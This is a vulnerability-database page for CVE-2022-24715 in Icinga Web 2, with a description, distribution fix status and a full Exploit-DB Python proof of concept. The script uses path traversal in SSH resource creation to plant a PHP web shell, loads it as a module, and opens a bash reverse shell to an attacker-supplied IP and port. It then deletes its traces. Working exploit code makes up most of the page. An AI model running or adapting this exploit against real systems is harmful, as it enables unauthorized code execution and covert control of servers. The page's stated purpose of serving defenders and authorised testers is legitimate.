CVE-2022-24715
unknown
CVSS v3
—
CVSS v4 NEW
—
VIR risk
1.0
Description
Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Authenticated users, with access to the configuration, can create SSH resource files in unintended directories, leading to the execution of arbitrary code. This issue has been resolved in versions 2.8.6, 2.9.6 and 2.10 of Icinga Web 2. Users unable to upgrade should limit access to the Icinga Web 2 configuration.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Icinga Web 2.10 - Authenticated Remote Code Execution
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
# Date: 8/07/2023
# Exploit Author: Dante Corona(Aka. cxdxnt)
# Software Link: https://github.com/Icinga/icingaweb2
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24715
# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715
import requests,argparse,re,random,string
from colorama import Fore,Style
def letter_random():
letras = string.ascii_lowercase
character_random = random.choices(letras, k=6)
return ''.join(character_random)
def users_url_password():
parser = argparse.ArgumentParser(description='Descripción de tu programa.')
parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')
parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')
parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')
parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')
parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')
args = parser.parse_args()
url = args.url
user = args.user
password=args.password
ip_attack = args.ip
port_attack = args.port
return url,user,password,ip_attack,port_attack
def login(url,user,password):
try:
login_url = url + "/icingaweb2/authentication/login"
session = requests.Session()
r = session.get(login_url)
csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
data_post = {"username":user,
"password":password,
"CSRFToken":csrf_regex,
"formUID":"form_login",
"btn_submit":"Login"
}
response = session.post(login_url,data=data_post)
if "Welcome to Icinga Web!" in response.text:
print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
r = session.get(login_url)
else:
print("[!]Failed to login.")
exit(1)
#return session,csrf_regex
except requests.exceptions.InvalidURL:
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
exit(1)
return session,csrf_regex
def upload_file(session,url,character_random,csrf_regex):
webshell = f"""-----BEGIN RSA PRIVATE KEY-----
MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
-----END RSA PRIVATE KEY-----
<?php system($_REQUEST["%s"]);?>
"""%character_random
upload_url = url + "/icingaweb2/config/createresource"
r = session.get(upload_url)
csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
data_post ={"type":"ssh",
"name":"shm/"+character_random,
"user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
"private_key":webshell,
"formUID":"form_config_resource",
"CSRFToken":csrf,
"btn_submit":"Save Changes"
}
upload_response = session.post(upload_url,data=data_post)
check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
if check.status_code != 200 :
print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
exit(1)
else:
print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")
def enable_module(session,url,character_random):
url_module = url+"/icingaweb2/config/general"
r_module = session.get(url_module)
csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]
data_post = {"global_show_stacktraces":"0",
"global_show_stacktraces":"1",
"global_show_application_state_messages":"0",
"global_show_application_state_messages":"1",
"global_module_path":"/dev/shm/",
"global_config_resource":"icingaweb2",
"logging_log":"none",
"themes_default":"Icinga",
"themes_disabled":"0",
"authentication_default_domain":"",
"formUID":"form_config_general",
"CSRFToken":f"{csrf_module}",
"btn_submit":"Save Changes"
}
resul = session.post(url_module,data_post)
#--------------------------------------------------
url_enable = url +"/icingaweb2/config/moduleenable"
r_enable = session.get(url_enable)
csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]
data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}
resul_enable = session.post(url_enable,data_enable)
def reverse_shell(session,url,ip_attack,port_attack,character_random):
reverse_url = url + "/icingaweb2/dashboard"
reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
reverse_response_one = session.get(reverse_exe_one)
try:
reverse_response_two = session.get(reverse_exe_two, timeout=5)
except:
print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")
remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
disable_url = url + "/icingaweb2/config/moduledisable"
r_disable = session.get(disable_url)
csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]
data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}
response_disable = session.post(disable_url,data=data_disable)
def disable_module(session,url,character_random):
url_disable = url + "/icingaweb2/config/moduledisable"
if __name__ == '__main__':
character_random = letter_random()
url,user,password,ip_attack,port_attack = users_url_password()
session,csrf_regex = login(url,user,password)
upload_file(session,url,character_random,csrf_regex)
enable_module(session,url,character_random)
reverse_shell(session,url,ip_attack,port_attack,character_random)OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| — | Affected | — |
Debian Mixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.9.6-1 |
| sid | Fixed | 2.9.6-1 |
| forky | Fixed | 2.9.6-1 |
| bullseye | Affected | — |
| bookworm | Fixed | 2.9.6-1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.